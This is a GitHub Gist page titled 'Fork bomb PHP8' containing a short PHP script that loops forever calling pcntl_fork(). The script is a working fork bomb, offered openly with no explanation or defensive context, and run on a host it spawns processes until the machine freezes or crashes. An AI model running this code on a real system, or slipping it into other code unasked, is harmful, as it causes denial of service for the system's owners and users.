Skip to content

Instantly share code, notes, and snippets.

@milksense
Created January 5, 2021 06:45
Show Gist options
  • Save milksense/d6cbaed9408e7edf069dd92954c7f610 to your computer and use it in GitHub Desktop.
Save milksense/d6cbaed9408e7edf069dd92954c7f610 to your computer and use it in GitHub Desktop.
Fork bomb PHP8
<?php
while(true) {
pcntl_fork();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment